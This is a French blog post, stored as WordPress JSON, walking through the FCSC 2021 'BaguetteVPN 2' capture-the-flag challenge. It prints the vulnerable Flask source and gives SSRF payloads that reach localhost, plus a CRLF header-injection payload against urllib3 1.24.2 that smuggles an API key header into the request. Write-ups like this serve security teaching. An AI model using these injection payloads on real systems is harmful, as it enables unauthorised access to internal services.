{"id":1618,"date":"2021-05-03T19:41:00","date_gmt":"2021-05-03T17:41:00","guid":{"rendered":"https:\/\/mikadmin.fr\/blog\/?p=1618"},"modified":"2021-09-19T01:43:23","modified_gmt":"2021-09-18T23:43:23","slug":"fcsc-2021-baguettevpn-2","status":"publish","type":"post","link":"https:\/\/mikadmin.fr\/blog\/fcsc-2021-baguettevpn-2\/","title":{"rendered":"FCSC 2021 : BaguetteVPN 2"},"content":{"rendered":"<\/span> 3<\/span> min read<\/span><\/span>

Views: 1050<\/p>\n

<\/div>\n\n\n\n

On va voir dans cet article, le challenge BaguetteVPN n\u00b02<\/strong> du FCSC 2021<\/strong> (France Cybersecurity Challenge<\/a><\/strong>).<\/p>\n\n\n\n

<\/p>\n\n\n\n

<\/div>\n\n\n\n
\n\n\n\n

Voici la description du challenge :<\/p>\n\n\n\n

<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n

Ce dernier \u00e9tant la suite du premier challenge nous trouvons donc des informations dans le code source :<\/p>\n\n\n\n

<\/div>\n\n\n\n
\"fcsc<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n

On retrouve donc le script utilis\u00e9 pour ce challenge dans http:\/\/challenges2.france-cybersecurity-challenge.fr:5002\/api\/debug<\/a> :<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
# \/usr\/bin\/env python3\n# -*- coding:utf-8 -*-\n# -*- requirements:requirements.txt -*-\n\n# Congrats! Here is the flag for Baguette VPN 1\/2\n#   FCSC{e5e3234f8dae908461c6ee777ee329a2c5ab3b1a8b277ff2ae288743bbc6d880}\n\nimport os\nimport urllib3\nimport sys\nfrom flask import Flask, request, jsonify, Response\napp = Flask(__name__)\n\n\n@app.route('\/')\ndef index():\n    with open('index.html', 'r') as myfile:\n        return myfile.read()\n\n\n@app.route('\/api')\ndef api():\n    return Response('OK', status=200)\n\n\n@app.route("\/api\/image")\ndef image():\n    filename = request.args.get("fn")\n    if filename:\n        http = urllib3.PoolManager()\n        return http.request('GET', 'http:\/\/baguette-vpn-cdn' + filename).data\n    else:\n        return Response('Param\u00e8tre manquant', status=400)\n\n\n@app.route("\/api\/secret")\ndef admin():\n    if request.remote_addr == '127.0.0.1':\n        if request.headers.get('X-API-KEY') == 'b99cc420eb25205168e83190bae48a12':\n            return jsonify({"secret": os.getenv('FLAG')})\n        return Response('Interdit: mauvaise cl\u00e9 d\\'API', status=403)\n    return Response('Interdit: mauvaise adresse IP', status=403)\n\n\n@app.route("\/api\/debug")\ndef debug():\n    data = {}\n    for k, v in globals().copy().items():\n        if not isinstance(v, str):\n            data[k] = str(dir(v))\n        else:\n            data[k] = v\n    data['__version__'] = sys.version\n    return jsonify(data)\n\n\n@app.route('\/<path:path>')\ndef load_page(path):\n    if '..' in path:\n        return Response('Interdit', status=403)\n    try:\n        with open(path, 'r') as myfile:\n            mime = 'text\/' + path.split('.')[-1]\n            return Response(myfile.read(), mimetype=mime)\n    except Exception as e:\n        return Response(str(e), status=404)\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=os.getenv('FLASK_LOCAL_PORT'))<\/code><\/pre>\n\n\n\n
<\/div>\n\n\n\n
Les deux parties qui nous int\u00e9ressent sont :<\/p>\n\n\n\n
@app.route("\/api\/image")\ndef image():\n    filename = request.args.get("fn")\n    if filename:\n        http = urllib3.PoolManager()\n        return http.request('GET', 'http:\/\/baguette-vpn-cdn' + filename).data\n    else:\n        return Response('Param\u00e8tre manquant', status=400)\n\n\n@app.route("\/api\/secret")\ndef admin():\n    if request.remote_addr == '127.0.0.1':\n        if request.headers.get('X-API-KEY') == 'b99cc420eb25205168e83190bae48a12':\n            return jsonify({"secret": os.getenv('FLAG')})\n        return Response('Interdit: mauvaise cl\u00e9 d\\'API', status=403)\n    return Response('Interdit: mauvaise adresse IP', status=403)<\/code><\/pre>\n\n\n\n
<\/div>\n\n\n\n
Afin de r\u00e9cup\u00e9rer le flag<\/a> sur \/api\/secret<\/span><\/strong> il faut venir en provenance de 127.0.0.1<\/strong><\/span> et envoyer un header avec l’API KEY<\/strong>.<\/p>\n\n\n\n
\n\n\n\n
C’est l\u00e0 que nous allons utiliser l’api image<\/strong> qui fait une requ\u00eate GET<\/span><\/strong> sur http:\/\/baguette-vpn-cdn<\/span><\/strong> et le param\u00e8tre fn<\/strong><\/span> que nous lui fournissons, pour venir en provenance de 127.0.0.1<\/span><\/strong> nous pouvons par exemple enregistrer un sous-domaine<\/strong> qui commence par baguette-vpn-cdn<\/span><\/strong> et qui pointe sur 127.0.0.1<\/strong> :<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
Et donc en utilisant comme param\u00e8tre .bookctf.eu<\/strong> ceci nous redirige vers le 127.0.0.1<\/span><\/strong> :<\/p>\n\n\n\n
http:\/\/baguette-vpn-cdn.bookctf.eu<\/code><\/pre>\n\n\n\n
<\/div>\n\n\n\n
\n\n\n\n
Avec un peu de flair et l’indice qui nous dit que le port est inf\u00e9rieur \u00e0 2000<\/strong> on peut donc supposer que c’est le fameux 1337<\/strong><\/span> ou bien avec une petite boucle testant chaque port de 1 \u00e0 2000.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n\n\n\n
\n\n\n\n
Il est \u00e9galement possible d’utiliser une m\u00e9thode plus facile avec des payloads comme :<\/p>\n\n\n\n
<\/div>\n\n\n\n
whatever.localhost:1337\/api\/secret\n@localhost:1337\/api\/secret\n@127.0.0.1\/api\/secret\n.localtest.me:1337\/api\/secret<\/code><\/pre>\n\n\n\n
\n\n\n\n
On a donc pass\u00e9 la premi\u00e8re condition<\/strong> et pour la derni\u00e8re il s’agit d’exploiter la faille CRLF<\/a><\/strong> et on trouve une bonne piste gr\u00e2ce au fichier requirements.txt<\/strong> qui nous donne la version du module urllib3<\/span><\/strong> (1.24.2<\/span><\/strong>) et \u00e0 ce lien<\/a> exploitant une CRLF<\/span><\/strong> dans le module urllib3<\/span><\/strong> qui est utilis\u00e9 par notre script.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\n\n\n\n
Nous pouvons donc injecter notre header<\/strong> permettant de r\u00e9cup\u00e9rer le flag gr\u00e2ce \u00e0 ce payload<\/strong> :<\/p>\n\n\n\n
%20HTTP\/1.1%0D%0AX-API-KEY:%20b99cc420eb25205168e83190bae48a12%0D%0AIgnore:<\/code><\/pre>\n\n\n\n
\n\n\n\n
Et on r\u00e9cup\u00e8re donc ce fameux flag !<\/p>\n\n\n\n
http:\/\/challenges2.france-cybersecurity-challenge.fr:5002\/api\/image?fn=.bookctf.eu:1337\/api\/secret%20HTTP\/1.1%0D%0AX-API-KEY:%20b99cc420eb25205168e83190bae48a12%0D%0AIgnore:<\/code><\/pre>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
<\/div>\n","protected":false},"excerpt":{"rendered":"
<\/span>  3<\/span> min read<\/span><\/span>Voici le write up du challenge Baguette VPN n\u00b02 du France Cybersecurity Challenge (FCSC 2021)<\/p>\n
Le but est de r\u00e9cup\u00e9rer le secret contenu dans l’API. Continuer la lecture →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":1620,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[4],"tags":[62,21,61,45,15,60,63],"class_list":["post-1618","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-infosec","tag-crlf","tag-ctf","tag-fcsc","tag-pentest","tag-python","tag-web","tag-writeup"],"aioseo_notices":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1618","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/comments?post=1618"}],"version-history":[{"count":0,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1618\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media\/1620"}],"wp:attachment":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media?parent=1618"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/categories?post=1618"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/tags?post=1618"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}